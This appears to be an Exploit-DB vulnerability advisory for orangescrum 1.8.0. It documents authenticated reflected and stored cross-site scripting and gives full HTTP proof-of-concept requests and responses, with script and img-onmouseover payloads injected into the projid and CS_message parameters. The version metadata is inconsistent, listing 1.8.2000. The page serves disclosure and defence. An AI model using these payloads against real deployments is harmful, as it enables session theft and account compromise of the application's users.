orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)

vendor:

orangescrum

by:

Hubert Wojciechowski

8.8

CVSS

HIGH

Cross-Site Scripting (XSS)

CWE

Product Name: orangescrum

Affected Version From: 1.8.2000

Affected Version To: 1.8.2000

Patch Exists: NO

Related CWE:

CPE: a:orangescrum:orangescrum:1.8.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

2021

orangescrum 1.8.0 – ‘Multiple’ Cross-Site Scripting (XSS) (Authenticated)

A reflected Cross-Site Scripting (XSS) vulnerability exists in orangescrum 1.8.0 when an authenticated user sends a maliciously crafted request to the application. The application does not properly sanitize user-supplied input, allowing an attacker to inject arbitrary HTML or JavaScript code into the application’s response. This can be exploited to execute arbitrary HTML or JavaScript code in the context of the affected application.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to generate unexpected results. Additionally, output encoding should be used to ensure that user-supplied data is not interpreted as executable code.

Source

Exploit-DB raw data:

# Exploit Title: orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)
# Date: 28/11/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Company: https://redteam.pl
# Vendor Homepage: https://www.orangescrum.org/
# Software Link: https://www.orangescrum.org/
# Version: 1.8.0
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### XSS Reflected


# Authenticated user

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example XSS Reflected

Param: projid
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------

POST /orangescrum/easycases/edit_reply HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 64
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/orangescrum/dashboard
Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; CURRENT_FILTER=cases
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

id=5&reply_flag=1&projid=1zxcvczxzxcv"><script>alert(1)</script>

-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sun, 28 Nov 2021 13:28:57 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Content-Length: 1114
Vary: User-Agent
Expires: access 12 month
Connection: close
Content-Type: text/html; charset=UTF-8

<table cellpadding="0" cellspacing="0" class="edit_rep_768 col-lg-12">
	<tr>
		<td>
			<textarea name="edit_reply_txtbox5" id="edit_reply_txtbox5" rows="3" class="reply_txt_ipad col-lg-12">
				                    xczcxz"/><b>bb</b>bbxczcxz"/>&ltxczcxz"/><b>bb</b>bb;b>bb</b>bbxczcxz"/><b>bb</b>bb			</textarea>
		</td>
	</tr>
	<tr>
		<td align="right">
			<div id="edit_btn5" class="fr">
				<button type="button" value="Save" style="margin:5px;padding:3px 32px 3px 32px;" class="btn btn_blue" onclick="save_editedvalue_reply(2,5,1zxcvczxzxcv"><script>alert(1)</script>,'c64271510399996f611739b
[...]


## Example XSS Stored

Example vuln paraMETERS:
* CS_message
* name
* data[User][email]

-----------------------------------------------------------------------------------------------------------------------
Param: CS_message
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------

POST /orangescrum/easycases/ajaxpostcase HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 393
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/orangescrum/dashboard/?project=3966c2c5cc3745d161640d07450d682c
Cookie: language=en-gb; currency=USD; CAKEPHP=j27a7es1lv1ln77gpngicqshe4; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; CURRENT_FILTER=cases; TASK_TYPE_IN_DASHBOARD=1; LAST_CREATED_PROJ=14
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

pid=14&CS_project_id=8f4adc0f496a3738f04d629be909488d&CS_istype=2&CS_title=&CS_type_id=15&CS_priority=1&CS_message=zxcvbzz"/><img%20src=x%20onmouseover=alert(1)>axcbv&CS_assign_to=1&CS_due_date=&CS_milestone=&postdata=Post&pagename=dashboard&emailUser%5B%5D=1&CS_id=2678&CS_case_no=1&datatype=1&CS_legend=2&prelegend=1&hours=0&estimated_hours=0&completed=0&taskid=0&task_uid=0&editRemovedFile=

-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sun, 28 Nov 2021 13:51:29 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Vary: User-Agent
Expires: access 12 month
Content-Length: 698
Connection: close
Content-Type: text/html; charset=UTF-8

{"success":"success","pagename":"dashboard","formdata":"8f4adc0f496a3738f04d629be909488d","postParam":"Post","caseUniqId":"eb8671bf1e20702b7793b11152e9ff32","format":2,"allfiles":null,"caseNo":"1","emailTitle":"aaaaaaaaaaaaaaz\"\/><img src=x onmouseover=alert(1)>a","emailMsg":"zxcvbzz\"\/><img src=x onmouseover=alert(1)>
[...]